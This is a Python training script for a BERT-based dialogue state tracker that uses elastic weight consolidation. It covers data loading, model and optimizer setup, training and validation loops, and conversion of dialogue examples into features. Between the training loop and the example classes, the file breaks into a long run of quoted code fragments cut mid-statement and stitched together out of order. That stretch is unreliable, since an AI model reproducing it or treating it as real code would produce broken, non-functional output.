        raise ValueError("Can't find %s " % vocab_dir)
    tokenizer = BertTokenizer.from_pretrained(vocab_dir, do_lower_case=args.do_lower_case)

    num_train_steps = None
    accumulation = False

    if args.do_train:
        train_examples = processor.get_train_examples(args.data_dir, accumulation=accumulation)
        dev_examples = processor.get_dev_examples(args.data_dir, accumulation=accumulation)
        num_train_steps = int(len(train_examples) / args.train_batch_size * args.num_train_epochs)
        num_dev_steps = int(len(dev_examples) / args.dev_batch_size * args.num_train_epochs)

        ## utterances
        all_input_ids, all_input_len, all_label_ids, all_prev_label_ids = convert_examples_to_features(
            train_examples, target_label_list, prev_label_list, args.max_seq_length, tokenizer,
            args.max_turn_length)
        logger.info("***** Running training *****")
        logger.info("  Num examples = %d", len(train_examples))
        logger.info("  Batch size = %d", args.train_batch_size)
        logger.info("  Num steps = %d", num_train_steps)
        all_input_ids, all_input_len, all_label_ids, all_prev_label_ids \
            = all_input_ids.to(device), all_input_len.to(device), all_label_ids.to(device), all_prev_label_ids.to(device)

        train_data = TensorDataset(all_input_ids, all_input_len, all_label_ids, all_prev_label_ids)
        if args.local_rank == -1:
            train_sampler = RandomSampler(train_data)
        else:
            train_sampler = DistributedSampler(train_data)
        train_dataloader = DataLoader(train_data, sampler=train_sampler, batch_size=args.train_batch_size)

        ## Dev
        all_input_ids_dev, all_input_len_dev, all_label_ids_dev, all_prev_label_ids_dev = convert_examples_to_features(
            dev_examples, target_label_list, prev_label_list, args.max_seq_length, tokenizer,
            args.max_turn_length)
        logger.info("***** Running validation *****")
        logger.info("  Num examples = %d", len(dev_examples))
        logger.info("  Batch size = %d", args.dev_batch_size)
        logger.info("  Num steps = %d", num_dev_steps)
        all_input_ids_dev, all_input_len_dev, all_label_ids_dev, all_prev_label_ids_dev \
            = all_input_ids_dev.to(device), all_input_len_dev.to(device), all_label_ids_dev.to(device), all_prev_label_ids_dev.to(device)

        dev_data = TensorDataset(all_input_ids_dev, all_input_len_dev, all_label_ids_dev, all_prev_label_ids_dev)
        dev_sampler = SequentialSampler(dev_data)
        dev_dataloader = DataLoader(dev_data, sampler=dev_sampler, batch_size=args.dev_batch_size)

    logger.info("Loaded data!")
    ###############################################################################
    # Build the models
    ###############################################################################

    # Prepare model
    if args.nbt == 'rnn':
        from BeliefTrackerSlotQueryMultiSlot import BeliefTracker
        if args.task_name.find("gru") == -1 and args.task_name.find("lstm") == -1:
            raise ValueError("The task name should include at least \"gru\" or \"lstm\"")
    elif args.nbt == 'turn':
        from BeliefTrackerSlotQueryMultiSlotTurn import BeliefTracker
    elif args.nbt == 'transformer':
        from BeliefTrackerSlotQueryMultiSlotTransformer import BeliefTracker
    else:
        raise ValueError('nbt type should be either rnn or transformer')
    from BeliefTrackerSlotQueryMultiSlotEWC import EWC

    model = BeliefTracker(args, num_labels, device)
    if args.fp16:
        model.half()

    # Load pretrained model
    # in the case that slot and values are different between the training and evaluation
    if args.load_path:
        output_model_file = os.path.join(args.load_path, "pytorch_model.bin")
        ptr_model = torch.load(output_model_file, map_location=device)
        del_list = []
        rename_list = []
        for key in ptr_model.keys():
            if ('slot_lookup' in key) or ('value_lookup' in key):  # remove slot_lookup and value_lookup
                del_list.append(key)
            if ('rnn.' in key):  # rename rnn -> nbt
                rename_list.append(key)
        for key in del_list:
            del ptr_model[key]
        for key in rename_list:
            new_key = key.replace('rnn.', 'nbt.')
            ptr_model[new_key] = ptr_model[key]
            del ptr_model[key]
        state = model.state_dict()
        state.update(ptr_model)
        model.load_state_dict(state)

    model.to(device)

    ## Get slot-value embeddings
    label_token_ids, label_len = [], []
    for labels in label_list:
        token_ids, lens = get_label_embedding(labels, args.max_label_length, tokenizer, device)
        label_token_ids.append(token_ids)
        label_len.append(lens)

    ## Get slot-type embeddings
    slot_token_ids, slot_len = get_label_embedding(processor.all_slot, args.max_label_length, tokenizer, device)

    model.initialize_slot_value_lookup(label_token_ids, label_len, slot_token_ids, slot_len)

    if args.local_rank != -1:
        try:
            from apex.parallel import DistributedDataParallel as DDP
        except ImportError:
            raise ImportError(
                "Please install apex from https://www.github.com/nvidia/apex to use distributed and fp16 training.")
        model = DDP(model)
    elif n_gpu > 1:
        model = torch.nn.DataParallel(model)

    # Prepare optimizer
    if args.do_train:
        def get_optimizer_grouped_parameters(model):
            param_optimizer = [(n, p) for n, p in model.named_parameters() if p.requires_grad]
            no_decay = ['bias', 'LayerNorm.bias', 'LayerNorm.weight']
            optimizer_grouped_parameters = [
                {'params': [p for n, p in param_optimizer if not any(nd in n for nd in no_decay)],
                 'weight_decay': 0.01, 'lr': args.learning_rate},
                {'params': [p for n, p in param_optimizer if any(nd in n for nd in no_decay)],
                 'weight_decay': 0.0, 'lr': args.learning_rate},
            ]
            return optimizer_grouped_parameters

        if n_gpu == 1:
            optimizer_grouped_parameters = get_optimizer_grouped_parameters(model)
        else:
            optimizer_grouped_parameters = get_optimizer_grouped_parameters(model.module)

        t_total = num_train_steps
        if args.local_rank != -1:
            t_total = t_total // torch.distributed.get_world_size()

        if args.fp16:
            try:
                from apex.optimizers import FP16_Optimizer
                from apex.optimizers import FusedAdam
            except ImportError:
                raise ImportError(
                    "Please install apex from https://www.github.com/nvidia/apex to use distributed and fp16 training.")
            optimizer = FusedAdam(optimizer_grouped_parameters,
                                  lr=args.learning_rate,
                                  bias_correction=False,
                                  max_grad_norm=1.0)
            if args.loss_scale == 0:
                optimizer = FP16_Optimizer(optimizer, dynamic_loss_scale=True)
            else:
                optimizer = FP16_Optimizer(optimizer, static_loss_scale=args.loss_scale)
        else:
            optimizer = BertAdam(optimizer_grouped_parameters,
                                 lr=args.learning_rate,
                                 warmup=args.warmup_proportion,
                                 t_total=t_total)
        logger.info(optimizer)
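    # EWC recap (a sketch of what the imported EWC class is assumed to
    # implement, following Kirkpatrick et al., 2017): given a diagonal Fisher
    # estimate F_i computed from the previous-task data and the old optimum
    # theta*_i, the regularizer is
    #     ewc.penalty(model) = sum_i F_i * (theta_i - theta*_i) ** 2
    # The training loop below adds it as
    #     loss = loss_ + args.lambda_ewc * ewc.penalty(model)
    # so parameters important for the previous slots are anchored while the new
    # target slots are learned.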
    ###############################################################################
    # Training code
    ###############################################################################

    if args.do_train:
        logger.info("Training...")

        global_step = 0
        last_update = None
        best_loss = None

        #### EWC: calculate Fisher information on the previous task
        ewc = EWC(model, dev_dataloader, oldtask=prev_slot_id, num_labels=num_labels,
                  device=device, n_gpu=n_gpu)

        for epoch in trange(int(args.num_train_epochs), desc="Epoch"):  # for epoch in trange(1):
            #### TRAIN
            model.train()
            tr_loss = 0
            nb_tr_examples, nb_tr_steps = 0, 0

            for step, batch in enumerate(tqdm(train_dataloader, desc="Iteration")):
                batch = tuple(t.to(device) for t in batch)
                input_ids, input_len, label_ids, _ = batch

                if n_gpu == 1:
                    loss_, loss_slot, acc, acc_slot, _ = model(input_ids, input_len, label_ids, n_gpu,
                                                               target_slot=target_slot_id)
                    loss_ewc = ewc.penalty(model)
                    loss = loss_ + args.lambda_ewc * loss_ewc
                else:
                    loss_, _, acc, acc_slot, _ = model(input_ids, input_len, label_ids, n_gpu,
                                                       target_slot=target_slot_id)
                    loss_ = loss_.mean()
                    acc = acc.mean()
                    acc_slot = acc_slot.mean(0)
                    loss = loss_ + args.lambda_ewc * ewc.penalty(model)

                if summary_writer is not None:
                    summary_writer.add_scalar("Train/Loss", loss_, global_step)
                    summary_writer.add_scalar("Train/JointAcc", acc, global_step)
                    if n_gpu == 1:
                        for i, slot in enumerate(processor.target_slot):
                            summary_writer.add_scalar("Train/Loss_%s" % slot.replace(' ', '_'),
                                                      loss_slot[i], global_step)
                            summary_writer.add_scalar("Train/Acc_%s" % slot.replace(' ', '_'),
                                                      acc_slot[i], global_step)

                tr_loss += loss.item()
                nb_tr_examples += input_ids.size(0)
                nb_tr_steps += 1

                if args.fp16:
                    optimizer.backward(loss)
                else:
                    loss.backward()

                if (step + 1) % args.gradient_accumulation_steps == 0:
                    # modify learning rate with special warm up BERT uses
                    lr_this_step = args.learning_rate * warmup_linear(global_step / t_total,
                                                                      args.warmup_proportion)
                    if summary_writer is not None:
                        summary_writer.add_scalar("Train/LearningRate", lr_this_step, global_step)
                    for param_group in optimizer.param_groups:
                        param_group['lr'] = lr_this_step
                    optimizer.step()
                    optimizer.zero_grad()
                    global_step += 1

            # Perform evaluation on the validation dataset
            model.eval()
            dev_loss = 0
            dev_acc = 0
            dev_loss_slot, dev_acc_slot = None, None
            nb_dev_examples, nb_dev_steps = 0, 0
            prev_dev_loss = 0
            prev_dev_acc = 0
            prev_dev_loss_slot, prev_dev_acc_slot = None, None
            prev_nb_dev_examples = 0

            for step, batch in enumerate(tqdm(dev_dataloader, desc="Validation")):
                batch = tuple(t.to(device) for t in batch)
                input_ids, input_len, label_ids, prev_label_ids = batch
                if input_ids.dim() == 2:
                    input_ids = input_ids.unsqueeze(0)
                    input_len = input_len.unsqueeze(0)
                    label_ids = label_ids.unsqueeze(0)  # fixed typo: was `unsuqeeze`
                    prev_label_ids = prev_label_ids.unsqueeze(0)

                with torch.no_grad():
                    if n_gpu == 1:
                        loss, loss_slot, acc, acc_slot, _ = model(input_ids, input_len, label_ids, n_gpu,
                                                                  target_slot=target_slot_id)
                        prev_loss, prev_loss_slot, prev_acc, prev_acc_slot, _ = model(
                            input_ids, input_len, prev_label_ids, n_gpu, target_slot=prev_slot_id)
                    else:
                        loss, _, acc, acc_slot, _ = model(input_ids, input_len, label_ids, n_gpu,
                                                          target_slot=target_slot_id)
                        loss = loss.mean()
                        acc = acc.mean()
                        acc_slot = acc_slot.mean(0)
                        prev_loss, _, prev_acc, prev_acc_slot, _ = model(
                            input_ids, input_len, prev_label_ids, n_gpu, target_slot=prev_slot_id)
                        prev_loss = prev_loss.mean()
                        prev_acc = prev_acc.mean()
                        prev_acc_slot = prev_acc_slot.mean(0)

                num_valid_turn = torch.sum(label_ids[:, :, 0].view(-1) > -1, 0).item()
                dev_loss += loss.item() * num_valid_turn
                dev_acc += acc.item() * num_valid_turn

                prev_num_valid_turn = torch.sum(prev_label_ids[:, :, 0].view(-1) > -1, 0).item()
                prev_dev_loss += prev_loss.item() * prev_num_valid_turn
                prev_dev_acc += prev_acc.item() * prev_num_valid_turn

                if n_gpu == 1:
                    if dev_loss_slot is None:
                        dev_loss_slot = [l * num_valid_turn for l in loss_slot]
                        dev_acc_slot = acc_slot * num_valid_turn
                        prev_dev_loss_slot = [l * prev_num_valid_turn for l in prev_loss_slot]
                        prev_dev_acc_slot = prev_acc_slot * prev_num_valid_turn
                    else:
                        for i, l in enumerate(loss_slot):
                            dev_loss_slot[i] = dev_loss_slot[i] + l * num_valid_turn
                        dev_acc_slot += acc_slot * num_valid_turn
                        for i, l in enumerate(prev_loss_slot):
                            prev_dev_loss_slot[i] = prev_dev_loss_slot[i] + l * prev_num_valid_turn
                        prev_dev_acc_slot += prev_acc_slot * prev_num_valid_turn

                nb_dev_examples += num_valid_turn
                prev_nb_dev_examples += prev_num_valid_turn

            dev_loss = dev_loss / nb_dev_examples
            dev_acc = dev_acc / nb_dev_examples
            prev_dev_loss = prev_dev_loss / prev_nb_dev_examples
            prev_dev_acc = prev_dev_acc / prev_nb_dev_examples
            if n_gpu == 1:
                dev_acc_slot = dev_acc_slot / nb_dev_examples
                prev_dev_acc_slot = prev_dev_acc_slot / prev_nb_dev_examples

            if summary_writer is not None:
                summary_writer.add_scalar("Validate/Loss", dev_loss, global_step)
                summary_writer.add_scalar("Validate/Acc", dev_acc, global_step)
                summary_writer.add_scalar("Validate/Prev_Loss", prev_dev_loss, global_step)
                summary_writer.add_scalar("Validate/Prev_Acc", prev_dev_acc, global_step)
                if n_gpu == 1:
                    for i, slot in enumerate(processor.target_slot):
                        summary_writer.add_scalar("Validate/Loss_%s" % slot.replace(' ', '_'),
                                                  dev_loss_slot[i] / nb_dev_examples, global_step)
                        summary_writer.add_scalar("Validate/Acc_%s" % slot.replace(' ', '_'),
                                                  dev_acc_slot[i], global_step)
                    for i, slot in enumerate(processor.prev_slot):
                        summary_writer.add_scalar("Validate/Prev_Loss_%s" % slot.replace(' ', '_'),
                                                  prev_dev_loss_slot[i] / prev_nb_dev_examples, global_step)
                        summary_writer.add_scalar("Validate/Prev_Acc_%s" % slot.replace(' ', '_'),
                                                  prev_dev_acc_slot[i], global_step)

            logger.info("*** Model Updated: Epoch=%d, Valid loss=%.6f, Valid acc=%.6f, Valid prev loss=%.6f, Valid prev acc=%.6f ***"
                        % (epoch, dev_loss, dev_acc, prev_dev_loss, prev_dev_acc))

            dev_loss = round(dev_loss, 6)
            if last_update is None or dev_loss < best_loss:
                # Save a trained model
                output_model_file = os.path.join(args.output_dir, "pytorch_model.bin")
                if args.do_train:
                    if n_gpu == 1:
                        torch.save(model.state_dict(), output_model_file)
                    else:
                        torch.save(model.module.state_dict(), output_model_file)

                last_update = epoch
                best_loss = dev_loss
                best_acc = dev_acc

                logger.info("*** Model Updated: Epoch=%d, Validation Loss=%.6f, Validation Acc=%.6f ***"
                            % (epoch, dev_loss, dev_acc))

            #if epoch > 100:
            if last_update + args.patience <= epoch:
                break
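    # Note: training keeps only the checkpoint with the best validation loss
    # (pytorch_model.bin above) and stops once no improvement has been seen for
    # args.patience epochs; the evaluation below reloads exactly that file.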
############################################################################### # Build the models ############################################################################### # Prepare", "slot.replace(' ','_'), prev_dev_acc_slot[i], global_step) logger.info(\"*** Model Updated: Epoch=%d, Valid loss=%.6f, Valid acc=%.6f, Valid", "= RandomSampler(train_data) else: train_sampler = DistributedSampler(train_data) train_dataloader = DataLoader(train_data, sampler=train_sampler, batch_size=args.train_batch_size) ## Dev", "None examples = [] for (i, line) in enumerate(lines): guid = \"%s-%s-%s\" %", "care\") ontology[slot].append(\"none\") fp_ontology.close() elif config.data_dir == \"data/multiwoz\": fp_ontology = open(os.path.join(config.data_dir, \"ontology.json\"), \"r\") ontology", "label_ids[0][turn][slot] == pred_slot[0][turn][slot]: class_correct[slot][label_ids[0][turn][slot]] +=1 drawfig = False print('hotel') print(label_ids[0, 0:10, 8:18].cpu() ==", "Eval results *****\") for key in sorted(result.keys()): logger.info(\" %s = %s\", key, str(result[key]))", "if total_length <= max_length: break if len(tokens_a) > len(tokens_b): tokens_a.pop() else: tokens_b.pop() ###############################################################################", "acc, acc_slot, _ = model(input_ids, input_len, label_ids, n_gpu, target_slot=target_slot_id) prev_loss, prev_loss_slot, prev_acc, prev_acc_slot,", "in total_acc_slot]) } out_file_name = 'eval_results' if args.target_slot=='all': out_file_name += '_all' output_eval_file =", "global_step) logger.info(\"*** Model Updated: Epoch=%d, Valid loss=%.6f, Valid acc=%.6f, Valid prev loss=%.6f, Valid", "prev_acc_slot, nb_eval_ex_prev) eval_loss /= nb_eval_examples if eval_loss_slot is None: # for multi-gpu eval_loss_slot", "base class.\"\"\" return [ self.ontology[slot] for slot in self.prev_slot] def _create_examples(self, lines, set_type,", "for x in tokenizer.tokenize(example.text_a)] tokens_b = None if example.text_b: tokens_b = [x if", "tqdm, trange import numpy as np import torch from torch.utils.data import TensorDataset, DataLoader,", "the distributed backend which will take care of sychronizing nodes/GPUs torch.distributed.init_process_group(backend='nccl') logger.info(\"device: {}", "TRAIN model.train() tr_loss = 0 nb_tr_examples, nb_tr_steps = 0, 0 for step, batch", "_, _, acc, _, pred_slot = model(input_ids, input_len, label_ids, 1) nturn = (label_ids[:,:,0].view(-1)", "batch) input_ids, input_len, label_ids, _ = batch if n_gpu == 1: loss_, loss_slot,", "nb_eval_ex_prev nb_eval_ex = (label_ids[:,:,0].view(-1) != -1).sum().item() nb_eval_examples += nb_eval_ex nb_eval_steps += 1 def", "= torch.tensor([f.label_id for f in features], dtype=torch.long) all_prev_label_ids = torch.tensor([f.prev_label_id for f in", "\" \".join([str(x) for x in input_ids])) logger.info(\"input_len: %s\" % \" \".join([str(x) for x", "= %d\", num_train_steps) all_input_ids, all_input_len, all_label_ids, all_prev_label_ids \\ = all_input_ids.to(device), all_input_len.to(device), all_label_ids.to(device), all_prev_label_ids.to(device)", "sequence classification.\"\"\" def __init__(self, guid, text_a, text_b=None, label=None, prev_label=None): self.guid = guid self.text_a", "in this training task self.prev_label = prev_label # trained slots in previous tasks", "from BeliefTrackerSlotQueryMultiSlotEWC import EWC else: raise ValueError('nbt type should be either rnn or", "tokens_b = [x if x != '#' else '[SEP]' for x in tokenizer.tokenize(example.text_b)]", "one of 
`do_train` or `do_eval` must be True.\") ############################################################################### # Load data ###############################################################################", "open(os.path.join(config.data_dir, \"ontology_dstc2_en.json\"), \"r\") ontology = json.load(fp_ontology) ontology = ontology[\"informable\"] del ontology[\"request\"] for slot", "the models ############################################################################### # Prepare model if args.nbt =='rnn': from BeliefTrackerSlotQueryMultiSlot import BeliefTracker", "-1 or args.no_cuda: device = torch.device(\"cuda\" if torch.cuda.is_available() and not args.no_cuda else \"cpu\")", "args.max_seq_length, tokenizer, args.max_turn_length) all_input_ids, all_input_len, all_label_ids, all_prev_label_ids \\ = all_input_ids.to(device), all_input_len.to(device), all_label_ids.to(device), all_prev_label_ids.to(device)", "############################################################################### # Load data ############################################################################### # Get Processor processor = Processor(args) prev_label_list =", "\"per_class_accuracy.txt\") with open(output_eval_incorr_file, \"w\") as writer: total_class_acc = 0 total_slot_class_acc = [] nlabels", "torch from torch.utils.data import TensorDataset, DataLoader, RandomSampler, SequentialSampler from torch.utils.data.distributed import DistributedSampler from", "\"0 (default value): dynamic loss scaling.\\n\" \"Positive power of 2: static loss scaling", "print(label_ids[0, 0:10, 8:18].cpu() == torch.Tensor(none_value_id[8:18]).long().repeat(10, 1)) print(pred_slot[0, 0:10, 8:18].cpu() == torch.Tensor(none_value_id[8:18]).long().repeat(10, 1)) print(label_ids[0,", "x in config.target_slot.split(':')]) self.prev_slot_idx = sorted([ int(x) for x in config.prev_slot.split(':')]) ontology_items =", "prev_acc, prev_acc_slot, nb_eval_ex_prev) eval_loss /= nb_eval_examples if eval_loss_slot is None: # for multi-gpu", "num_train_steps if args.local_rank != -1: t_total = t_total // torch.distributed.get_world_size() if args.fp16: try:", "label: \" + prev_label_info) curr_dialogue_idx = example.guid.split('-')[1] curr_turn_idx = int(example.guid.split('-')[2]) if (prev_dialogue_idx is", "# for multi-gpu eval_loss_slot = [0] prev_eval_loss_slot = [0] eval_accuracy = eval_accuracy /", "acc.item() * nb_eval_ex if loss_slot is not None: if eval_loss_slot is None: eval_loss_slot", "raise NotImplementedError() # sorting the ontology according to the alphabetic order of the", "range(0, nslot): fig, axs = plt.subplots(nturn, 1, figsize=(50, 10*nturn)) print(\"Slot\", slot) for turn", "if args.do_analyze and (args.local_rank == -1 or torch.distributed.get_rank() == 0): pdb.set_trace() def draw(data,", "acc == 1: dialog = [] for input, label, pred in zip(input_ids[0], label_ids[0],", "!= line[0]: text_a = line[2] text_b = line[3] prev_dialogue_index = line[0] else: #", "sequences shorter \\n\" \"than this will be padded.\") parser.add_argument(\"--max_label_length\", default=32, type=int, help=\"The maximum", "slots to train self.target_slot = [] self.prev_slot = [] self.target_slot_idx = sorted([ int(x)", "loss_, _, acc, acc_slot, _ = model(input_ids, input_len, label_ids, n_gpu, target_slot=target_slot_id) loss_ =", "default='tensorboard', type=str, required=False, help=\"Tensorboard directory\") parser.add_argument(\"--nbt\", default='rnn', type=str, required=True, help=\"nbt type: rnn or", "('value_lookup' in key): # 
remove slot_lookup and value_lookup del_list.append(key) if ('rnn.' in key):", "prev_nb_dev_examples if n_gpu == 1: dev_acc_slot = dev_acc_slot / nb_dev_examples prev_dev_acc_slot = prev_dev_acc_slot", "len(processor.prev_slot))) # List of slots in previous task target_slot_id = list(range(len(processor.prev_slot), len(processor.all_slot))) #", "default='', help='pretrained model directory name') parser.add_argument(\"--target_slot\", default='', type=str, required=True, help=\"Target slot idx to", "> 1: model = model.module state = model.state_dict() state.update(ptr_model) model.load_state_dict(state) model.to(device) ## Get", "attn_scores = model.attn.get_scores().transpose(1, 2).contiguous().view(label_ids.size(1)*nslot, -1, max_len) for slot in range(0, nslot): fig, axs", "summary_writer.add_scalar(\"Train/Loss_%s\" % slot.replace(' ','_'), loss_slot[i], global_step) summary_writer.add_scalar(\"Train/Acc_%s\" % slot.replace(' ','_'), acc_slot[i], global_step) tr_loss", "l * nb_eval_ex for l in loss_slot] else: for i, l in enumerate(loss_slot):", "all_label_ids.to(device), all_prev_label_ids.to(device) logger.info(\"***** Running evaluation *****\") logger.info(\" Num examples = %d\", len(eval_examples)) logger.info(\"", "ewc.penalty(model) loss = loss_ + args.lambda_ewc * loss_ewc if args.gradient_accumulation_steps > 1: loss", "if loss_slot is not None: if eval_loss_slot is None: eval_loss_slot = [ l", "required=True, help=\"The name of the task to train: bert, bert-gru, bert-lstm, \" \"bert-label-embedding,", "logger.info(\"Loaded data!\") ############################################################################### # Build the models ############################################################################### # Prepare model if args.nbt", "in enumerate(loss_slot): eval_loss_slot[i] = eval_loss_slot[i] + l * nb_eval_ex if eval_acc_slot is None:", "all_prev_label_ids \\ = all_input_ids.to(device), all_input_len.to(device), all_label_ids.to(device), all_prev_label_ids.to(device) logger.info(\"***** Running evaluation *****\") logger.info(\" Num", "default=0.1, type=float, help=\"Hyper-parameter for EWC\") parser.add_argument(\"--no_cuda\", action='store_true', help=\"Whether not to use CUDA when", "for full data eval_sampler = SequentialSampler(eval_data) eval_dataloader = DataLoader(eval_data, sampler=eval_sampler, batch_size=args.eval_batch_size) model.eval() eval_loss,", "args.no_cuda else \"cpu\") n_gpu = torch.cuda.device_count() else: torch.cuda.set_device(args.local_rank) device = torch.device(\"cuda\", args.local_rank) n_gpu", "prev_acc_slot.mean(0) nb_eval_ex_prev = (prev_label_ids[:,:,0].view(-1) != -1).sum().item() nb_eval_examples_prev += nb_eval_ex_prev nb_eval_ex = (label_ids[:,:,0].view(-1) !=", "if args.fp16: optimizer.backward(loss) else: loss.backward() if summary_writer is not None: summary_writer.add_scalar(\"Epoch\", epoch, global_step)", "self.prev_label = prev_label # trained slots in previous tasks class InputFeatures(object): \"\"\"A single", "############################################################################### # Test output_model_file = os.path.join(args.output_dir, \"pytorch_model.bin\") # Load a trained model that", "== torch.Tensor(none_value_id[8:18]).long().repeat(10, 1)) print(label_ids[0, 0:10, 0:8].cpu() == torch.Tensor(none_value_id[0:8]).long().repeat(10, 1)) print(label_ids[0, 0:10, 18:].cpu() ==", "prev_dev_acc = prev_dev_acc / prev_nb_dev_examples if n_gpu == 1: dev_acc_slot = dev_acc_slot /", "int(x) for x in 
config.prev_slot.split(':')]) ontology_items = list(self.ontology.items()) for idx, domain in enumerate(ontology_items):", "= sorted([ int(x) for x in config.target_slot.split(':')]) self.prev_slot_idx = sorted([ int(x) for x", "help=\"The output directory where the model predictions and checkpoints will be written.\") parser.add_argument('--load_path',", "curr_dialogue_idx prev_turn_idx = curr_turn_idx if prev_turn_idx < max_turn_length: features += [InputFeatures(input_ids=all_padding, input_len=all_padding_len, label_id=[-1]*slot_dim,", "Batch size = %d\", args.dev_batch_size) logger.info(\" Num steps = %d\", num_dev_steps) all_input_ids_dev, all_input_len_dev,", "%s \" % vocab_dir) tokenizer = BertTokenizer.from_pretrained(vocab_dir, do_lower_case=args.do_lower_case) num_train_steps = None accumulation =", "loss_slot, acc, acc_slot, _ = model(input_ids, input_len, label_ids, n_gpu, target_slot=target_slot_id) loss = loss_", "model(input_ids, input_len, label_ids, n_gpu, target_slot=target_slot_id) loss = loss_ + args.lambda_ewc * ewc.penalty(model) prev_loss,", "t in batch) input_ids, input_len, label_ids, _ = batch if n_gpu == 1:", "help=\"Total batch size for training.\") parser.add_argument(\"--dev_batch_size\", default=1, type=int, help=\"Total batch size for validation.\")", "backward/update pass.\") parser.add_argument('--fp16', action='store_true', help=\"Whether to use 16-bit float precision instead of 32-bit\")", "ewc.penalty(model) loss = loss_ + args.lambda_ewc * loss_ewc else: loss_, _, acc, acc_slot,", "line[2] + \" # \" + text_a text_b = line[3] + \" #", "with '[SEP]' after tokenization. text_a = line[2] + \" # \" + text_a", "= batch if input_ids.dim() == 2: input_ids = input_ids.unsqueeze(0) input_len = input_len.unsqueeze(0) label_ids", "for i, l in enumerate(loss_slot): dev_loss_slot[i] = dev_loss_slot[i] + l * num_valid_turn dev_acc_slot", "warmup_linear(x, warmup=0.002): if x < warmup: return x / warmup return 1.0 -", "label_ids, 1) nturn = (label_ids[:,:,0].view(-1) != -1).sum().item() nslot = label_ids.size(2) for slot in", "out_file_name = 'eval_results' if args.target_slot=='all': out_file_name += '_all' output_eval_file = os.path.join(args.output_dir, \"%s.txt\" %", "eval_dataloader = DataLoader(eval_data, sampler=eval_sampler, batch_size=1) model.eval() none_value_id = [ len(val)-1 for val in", "== \"data/multiwoz\": fp_ontology = open(os.path.join(config.data_dir, \"ontology.json\"), \"r\") ontology = json.load(fp_ontology) for slot in", "+ [\"[SEP]\"] label_token_ids = tokenizer.convert_tokens_to_ids(label_tokens) label_len = len(label_token_ids) label_padding = [0] * (max_seq_length", "[CLS] and [SEP] with \"- 2\" if len(tokens_a) > max_seq_length - 2: tokens_a", "'[SEP]' after tokenization. 
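
# The sketch below illustrates the TSV row layout `_create_examples` consumes,
# inferred from the indexing above: column 0 is the dialogue index, column 1
# the turn index, columns 2 and 3 the user utterance and system response, and
# columns 4+ one value per ontology slot. The row contents and slot indices
# here are hypothetical, for illustration only.
def _example_tsv_row():
    row = ['0', '1', 'i want a cheap restaurant', 'what area do you prefer ?',
           'centre', 'none', 'cheap']  # area, food, price range (made up)
    target_slot_idx, prev_slot_idx = [2], [0, 1]
    return InputExample(
        guid="train-%s-%s" % (row[0], row[1]),
        text_a=row[2],
        text_b=row[3],
        label=[row[4 + idx] for idx in target_slot_idx],
        prev_label=[row[4 + idx] for idx in prev_slot_idx])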

def convert_examples_to_features(examples, label_list, prev_label_list,
                                 max_seq_length, tokenizer, max_turn_length):
    """Loads a data file into a list of `InputBatch`s."""

    slot_dim = len(label_list)
    prev_slot_dim = len(prev_label_list)

    def _hard_coding_label(label):
        return 'do not care' if label == 'dontcare' else label

    def _get_label(label, label_list):
        label_id = []
        label_info = ''
        label_map = [{_label: i for i, _label in enumerate(labels)} for labels in label_list]
        for i, label in enumerate(label):
            label = _hard_coding_label(label)
            label_id.append(label_map[i][label])
            label_info += '%s (id = %d) ' % (label, label_map[i][label])
        return label_id, label_info

    features = []
    prev_dialogue_idx = None
    all_padding = [0] * max_seq_length
    all_padding_len = [0, 0]

    max_turn = 0
    for (ex_index, example) in enumerate(examples):
        if max_turn < int(example.guid.split('-')[2]):
            max_turn = int(example.guid.split('-')[2])
    max_turn_length = min(max_turn + 1, max_turn_length)
    logger.info("max_turn_length = %d" % max_turn)

    for (ex_index, example) in enumerate(examples):
        tokens_a = [x if x != '#' else '[SEP]' for x in tokenizer.tokenize(example.text_a)]
        tokens_b = None
        if example.text_b:
            tokens_b = [x if x != '#' else '[SEP]' for x in tokenizer.tokenize(example.text_b)]
            # Account for [CLS], [SEP], [SEP] with "- 3"
            _truncate_seq_pair(tokens_a, tokens_b, max_seq_length - 3)
        else:
            # Account for [CLS] and [SEP] with "- 2"
            if len(tokens_a) > max_seq_length - 2:
                tokens_a = tokens_a[:(max_seq_length - 2)]

        tokens = ["[CLS]"] + tokens_a + ["[SEP]"]
        input_len = [len(tokens), 0]
        if tokens_b:
            tokens += tokens_b + ["[SEP]"]
            input_len[1] = len(tokens_b) + 1

        input_ids = tokenizer.convert_tokens_to_ids(tokens)

        # Zero-pad up to the sequence length (padding index 0).
        input_ids += [0] * (max_seq_length - len(input_ids))
        assert len(input_ids) == max_seq_length

        label_id, label_info = _get_label(example.label, label_list)
        prev_label_id, prev_label_info = _get_label(example.prev_label, prev_label_list)

        if ex_index < 5:
            logger.info("*** Example ***")
            logger.info("guid: %s" % example.guid)
            logger.info("tokens: %s" % " ".join([str(x) for x in tokens]))
            logger.info("input_ids: %s" % " ".join([str(x) for x in input_ids]))
            logger.info("input_len: %s" % " ".join([str(x) for x in input_len]))
            logger.info("label: " + label_info)
            logger.info("previous label: " + prev_label_info)

        curr_dialogue_idx = example.guid.split('-')[1]
        curr_turn_idx = int(example.guid.split('-')[2])

        # Pad the previous dialogue up to max_turn_length before starting a new one.
        if (prev_dialogue_idx is not None) and (prev_dialogue_idx != curr_dialogue_idx):
            if prev_turn_idx < max_turn_length:
                features += [InputFeatures(input_ids=all_padding,
                                           input_len=all_padding_len,
                                           label_id=[-1] * slot_dim,
                                           prev_label_id=[-1] * prev_slot_dim)] \
                            * (max_turn_length - prev_turn_idx - 1)
            assert len(features) % max_turn_length == 0

        if curr_turn_idx < max_turn_length:
            features.append(InputFeatures(input_ids=input_ids,
                                          input_len=input_len,
                                          label_id=label_id,
                                          prev_label_id=prev_label_id))

        prev_dialogue_idx = curr_dialogue_idx
        prev_turn_idx = curr_turn_idx

    if prev_turn_idx < max_turn_length:
        features += [InputFeatures(input_ids=all_padding,
                                   input_len=all_padding_len,
                                   label_id=[-1] * slot_dim,
                                   prev_label_id=[-1] * prev_slot_dim)] \
                    * (max_turn_length - prev_turn_idx - 1)
    assert len(features) % max_turn_length == 0

    all_input_ids = torch.tensor([f.input_ids for f in features], dtype=torch.long)
    all_input_len = torch.tensor([f.input_len for f in features], dtype=torch.long)
    all_label_ids = torch.tensor([f.label_id for f in features], dtype=torch.long)
    all_prev_label_ids = torch.tensor([f.prev_label_id for f in features], dtype=torch.long)

    # reshape tensors to [#dialogues, max_turn_length, ...]
    all_input_ids = all_input_ids.view(-1, max_turn_length, max_seq_length)
    all_input_len = all_input_len.view(-1, max_turn_length, 2)
    all_label_ids = all_label_ids.view(-1, max_turn_length, slot_dim)
    all_prev_label_ids = all_prev_label_ids.view(-1, max_turn_length, prev_slot_dim)

